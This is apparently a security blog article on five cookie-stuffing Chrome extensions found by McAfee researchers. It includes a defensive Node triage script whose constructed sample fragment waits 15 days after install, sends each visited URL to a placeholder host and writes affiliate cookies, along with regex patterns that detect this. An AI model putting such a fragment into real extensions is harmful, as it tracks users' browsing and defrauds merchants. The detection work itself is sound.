The Chrome Web Store is a treasure trove of browser extensions and utilities for Google Chrome users. However, wherever digital footfalls increase, attackers follow. Hackers are increasingly targeting Chrome extensions to commit affiliate fraud or steal sensitive credentials from browsers. Researchers found five cookie-stuffing Chrome extensions in the Chrome Web Store.
What is a cookie-stuffing Chrome extension?
Browser extensions offer miscellaneous utilities, such as allowing users to take screenshots of an entire website in one go, generate website coupons, watch Netflix shows together, etc. Browser extensions can also track users' browsing activities and personal preferences on the web. Cookie-stuffing Chrome extensions are Google Chrome extensions that modify the cookies on a site so that the extension creators receive affiliate payment for items purchased there.
How are attackers leveraging imposter Chrome extensions?
A few months ago, McAfee Labs discovered malicious extensions that can redirect users to phishing sites. The team then focused their research on several other Chrome extensions. They found five imposter cookie-stuffing Chrome extensions that tracked the victim's browsing activities to exploit retail affiliate programs. These malicious Chrome extensions are:
Netflix Party: 800,000+ downloads
Full Page Screenshot Capture: Screenshotting: 200,000+ downloads
FlipShope: Price Tracker Extension: 80,000+ downloads
Netflix Party: 300,000+ downloads (different from the first)
AutoBuy Flash Sales: 20,000+ downloads
Together, these browser extensions recorded 1.4 million downloads. McAfee researchers Oliver Devane and Vallabh Chole mentioned, "The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage." Currently, the "Full Page Screenshot" and "FlipShope" extensions are available for installation and can pose threats to the users. Google has removed Netflix Party and other extensions from the Web Store.
How do these imposter Chrome extensions work?
Whenever a victim purchases anything from the targeted e-commerce sites, the extension authors get a percentage of the profit for that purchase. Researchers identified that the extensions have a manifest.json that sets the background page as bg.html. It loads a b0.js file that is responsible for transmitting the URL being visited and injecting malicious code into any e-commerce site. Researchers also noted that the code creates random IDs by selecting 8 arbitrary characters from a character set.
McAfee researchers added, "Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into e-commerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased." Apart from all these functionalities, these cookie-stuffing Chrome extensions also have a mechanism that delays the malicious behaviour by 15 days from the day of installation, so that the extension does not raise red flags during the period when it is most likely to be tested.
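The traits described in the two paragraphs above (a background page declared in manifest.json, a background script that reports every visited URL to a remote server and writes cookies, and a delay of about 15 days after installation) can be turned into a static triage check that a defender runs over an unpacked extension before allowing it in a fleet. The following Node script is an added example written for this article; it is not McAfee's tooling and not code from any of the extensions named. The manifests, the script fragments and the scoring rules are all constructed for illustration, and the regex heuristics are deliberately simple: they flag code for human review rather than prove it malicious.

```javascript
// Added example: static triage of an unpacked Chrome extension for the traits
// the article describes. Sample inputs are constructed; heuristics are
// illustrative and meant to queue an extension for manual review.

// Constructed manifest in the shape the article describes: a Manifest V2
// extension whose background page is bg.html, with broad host access.
const SUSPECT_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "Constructed suspect sample",
  version: "1.0",
  background: { page: "bg.html" },
  permissions: ["cookies", "tabs", "storage", "<all_urls>"],
});

// Constructed background-script fragment showing the three behaviours the
// article attributes to b0.js (report visited URL, write cookies, wait 15
// days after install). It is input for the scanner only and is never run.
const SUSPECT_SCRIPT = `
chrome.runtime.onInstalled.addListener(() => chrome.storage.local.set({ t0: Date.now() }));
chrome.tabs.onUpdated.addListener((tabId, info, tab) => {
  chrome.storage.local.get("t0", (r) => {
    if (Date.now() - r.t0 < 15 * 24 * 60 * 60 * 1000) return;
    fetch("https://PLACEHOLDER.invalid/r", { method: "POST", body: tab.url });
    chrome.cookies.set({ url: tab.url, name: "ref", value: "PLACEHOLDER" });
  });
});
`;

// Constructed benign comparison: a screenshot helper with narrow permissions.
const BENIGN_MANIFEST = JSON.stringify({
  manifest_version: 3,
  name: "Constructed benign sample",
  version: "1.0",
  permissions: ["activeTab"],
});
const BENIGN_SCRIPT = `
chrome.action.onClicked.addListener(() => chrome.tabs.captureVisibleTab((png) => save(png)));
`;

const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];
const SENSITIVE = ["cookies", "tabs", "webRequest", "webRequestBlocking"];

// Manifest checks: long-lived background code plus permissions that let it
// observe every tab and change cookies on any site.
function auditManifest(text) {
  const m = JSON.parse(text);
  const flags = [];
  const bg = m.background || {};
  if (bg.page || bg.service_worker || (bg.scripts && bg.scripts.length)) {
    flags.push("background-component");
  }
  const perms = [].concat(m.permissions || [], m.host_permissions || []);
  if (perms.some((p) => SENSITIVE.includes(p))) flags.push("sensitive-permission");
  if (perms.some((p) => BROAD_HOSTS.includes(p))) flags.push("broad-host-access");
  return flags;
}

// Script checks: each flag needs two co-occurring indicators so that a lone
// fetch() or a lone Date.now() does not trip it.
function auditScript(src) {
  const flags = [];
  const network = /\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(/.test(src);
  const visitedUrl = /\btab\.url\b|location\.href|tabs\.onUpdated/.test(src);
  if (network && visitedUrl) flags.push("url-reporting");
  if (/chrome\.cookies\.set\s*\(|document\.cookie\s*=[^=]/.test(src)) flags.push("cookie-write");
  // The article does not say how the 15-day delay is implemented; this
  // heuristic assumes an install-time timestamp compared against the clock.
  const installHook = /runtime\.onInstalled/.test(src);
  const clock = /Date\.now\s*\(\)|new Date\s*\(/.test(src);
  const dayScale = /24\s*\*\s*60\s*\*\s*60|86400|1296000000/.test(src);
  if (installHook && clock && dayScale) flags.push("delayed-activation");
  return flags;
}

// Constructed scoring: URL reporting together with cookie writes is the
// cookie-stuffing pattern itself; two or more other flags still warrant a look.
function triage(manifestText, scriptText) {
  const flags = auditManifest(manifestText).concat(auditScript(scriptText));
  let verdict = "low";
  if (flags.includes("url-reporting") && flags.includes("cookie-write")) verdict = "review-urgently";
  else if (flags.length >= 2) verdict = "review";
  return { flags, verdict };
}

console.log("suspect:", triage(SUSPECT_MANIFEST, SUSPECT_SCRIPT));
console.log("benign:", triage(BENIGN_MANIFEST, BENIGN_SCRIPT));
```

In practice the same checks would be run over every .js file in the unpacked extension directory, not just the background script, because the article notes that the URL reporting and the code injection are split across the background page and the pages it injects into.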
How to protect your system from imposter extensions
Here are a few things you can do before installing an extension.
Do thorough research: Before using any extension, security professionals and experts recommend thorough research to check whether the extension can pose threats.
Use extensions only if required: Use browser extensions only if they are essential. There are lots of little-known extensions that can steal sensitive credentials or secretly monitor your browsing behaviour.
Keep yourself up to date: Stay updated with the latest research/news reports, and make a checklist of all the blacklisted extensions available in the store.
Seek guidance: Do not install any extension from third-party or torrent websites. Seek expert guidance from Packetlabs to build defensive mechanisms.